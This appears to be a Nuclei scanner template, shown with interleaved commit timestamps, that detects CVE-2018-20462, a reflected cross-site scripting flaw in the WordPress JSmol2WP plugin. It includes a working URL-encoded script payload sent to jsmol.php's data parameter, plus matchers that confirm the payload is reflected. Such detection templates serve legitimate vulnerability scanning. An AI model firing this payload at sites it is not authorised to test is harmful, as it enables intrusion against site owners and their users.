2021-07-15 17:12:52 +00:00
id : CVE-2018-20462
info :
2022-08-12 00:45:50 +00:00
name : WordPress JSmol2WP <=1.07 - Cross-Site Scripting
2021-07-15 17:12:52 +00:00
author : daffainfo
severity : medium
2022-08-12 00:45:50 +00:00
description : WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS
- https://wpvulndb.com/vulnerabilities/9196
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20462
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20462
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,wordpress,xss,wp-plugin
2021-07-15 17:12:52 +00:00
requests :
- method : GET
path :
2021-07-19 06:01:57 +00:00
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
2021-07-15 17:12:52 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-19 06:01:57 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-15 17:12:52 +00:00
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-08-12 00:45:50 +00:00
# Enhanced by mp on 2022/08/11